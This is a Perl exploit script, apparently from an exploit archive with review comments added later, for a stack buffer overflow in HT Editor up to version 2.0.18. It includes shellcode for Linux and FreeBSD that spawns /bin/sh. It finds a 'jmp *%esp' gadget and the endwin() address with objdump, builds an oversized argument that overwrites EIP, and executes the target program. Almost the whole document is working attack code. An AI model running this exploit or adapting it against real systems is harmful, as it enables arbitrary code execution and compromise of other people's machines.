# Exploit Title: HT Editor File opening Stack Overflow (0day)
# Date: March 30th 2011
# Author: ZadYree
# Software Link: http://hte.sourceforge.net/downloads.html
# Version: <= 2.0.18
# Tested on: Linux/Windows (buffer padding may differ on W32)
# CVE : None
#!/usr/bin/perl
=head1 TITLE
HT Editor <=2.0.18 0day Stack-Based Overflow Exploit
=head1 DESCRIPTION
The vulnerability is triggered by an overly large argument (+ path), which simply lets you overwrite EIP.
=head2 AUTHOR
ZadYree ~ 3LRVS Team
=head3 SEE ALSO
ZadYree's blog: z4d.tuxfamily.org
3LRVS blog: 3lrvs.tuxfamily.org
Shellcodes based on
http://www.shell-storm.org/shellcode/files/shellcode-606.php
http://www.shell-storm.org/shellcode/files/shellcode-171.php
=> Thanks
=cut
use 5.010;    # needed for say() and for the given/when blocks in the subs below

# NOTE(review): the script has no "use strict" / "use warnings". These two
# package-level scalars are written by the main loop below and by getendwin().
my ($esp, $retaddr);

# Two shellcode strings selected by target OS in get_infos(): index 0 is
# returned for Linux, index 1 for FreeBSD. The POD above credits the
# shell-storm entries 606 and 171 as their bases.
my $scz = [ "\xeb\x11\x5e\x31\xc9\xb1\x21\x80\x6c\x0e" .
            "\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8" .
            "\xea\xff\xff\xff\x6b\x0c\x59\x9a\x53\x67" .
            "\x69\x2e\x71\x8a\xe2\x53\x6b\x69\x69\x30" .
            "\x63\x62\x74\x69\x30\x63\x6a\x6f\x8a\xe4" .
            "\x53\x52\x54\x8a\xe2\xce\x81",
            "\xeb\x17\x5b\x31\xc0\x88\x43\x07\x89\x5b" .
            "\x08\x89\x43\x0c\x50\x8d\x53\x08\x52\x53" .
            "\xb0\x3b\x50\xcd\x80\xe8\xe4\xff\xff\xff" .
            "/bin/sh" ];

# Single-quoted, so "$esp" here is literal text rather than the variable.
say'[*]Looking for $esp and endwin()...';

# Hard-coded binary paths: [0] is used for Linux, [1] for FreeBSD (see get_infos).
my $namez = [qw#/usr/bin/hte /usr/local/bin/ht#];

# get_infos() returns [binary path, padding length, shellcode, endwin address
# as a hex string] for the OS named by `uname`. For any other OS it falls
# through without a return, so every field read below would be undefined.
my $infos = get_infos(qx{uname});

my $name = $infos->[0];

say '[+]endwin() address found! (0x', $infos->[3],')';

# Scan the disassembly for a "jmp *%esp" instruction (opcode bytes ff e4).
# The regex captures 7 hex digits of its address and "0" is prepended to make
# 8; the comma operator performs the assignment and then `last` on the first
# match. $name comes from the hard-coded list above, so the qx{} interpolation
# does not read external input here.
for my $line(qx{objdump -D $name | grep "ff e4"}) {
    $esp = "0" . $1, last if ($line =~ m{([a-f0-9]{7}).+jmp\s{4}\*%esp});
}

# "\012" is an octal escape for a newline inside the double-quoted part.
say '[+]$esp place found! (0x', $esp, ")\012Now exploiting...";

# One argument is handed to the target binary: filler "A"s (padding length
# minus the length of the `pwd` output, which includes its trailing newline),
# then the two addresses converted from hex text to bytes and reversed
# (little-endian byte order), then the shellcode. Nothing verifies that $esp
# or $infos->[3] were actually found before they are packed.
my @payload = ($infos->[0], ("A" x ($infos->[1] - length(qx{pwd}))) . reverse(pack('H*', $infos->[3])) . reverse(pack('H*', $esp)) . $infos->[2]);

exec(@payload);    # list-form exec (no shell); a failed exec is not reported
# Select the per-OS parameters from the `uname` output passed as the only
# argument. Returns an array ref: [binary path, padding length, shellcode,
# endwin address as hex text]. Reads the package-level $namez and $scz set in
# the main script. given/when is experimental on Perl 5.18+ (and smartmatch
# deprecated on 5.38+); it parses here because of `use 5.010`.
sub get_infos {
    given(shift) {
        when(/Linux/) {
            # The endwin address is looked up at run time from objdump output.
            return([$namez->[0], 4108, $scz->[0], getendwin("linux")]);
        }
        when(/FreeBSD/) {
            # The FreeBSD endwin address is a fixed value in getendwin().
            return([$namez->[1], 271, $scz->[1], getendwin("freebsd")]);
        }
        # Possibility to add friends ^^
        # No default branch: any other OS leaves the sub without a return value.
    }
}
# Return the endwin() address as a hex string for the OS tag given as the only
# argument ("linux" or "freebsd"); any other tag produces no return value.
sub getendwin {
    given(shift) {
        when("linux") {
            my $n = $namez->[0];    # hard-coded binary path from the main script
            # Take the first disassembly line mentioning endwin and store
            # everything before its last " <" (the .* is greedy) in the
            # package variable $retaddr, then stop.
            # NOTE(review): assumes that prefix is a bare hex address — confirm
            # against the actual objdump output format.
            for (qx{objdump -d $n | grep endwin}) {
                $retaddr = $1, last if ($_ =~ m{(.*) <});
            }
            return($retaddr);
        }
        when("freebsd") {
            return("282c2990");    # fixed address used for the FreeBSD target
        }
    }
}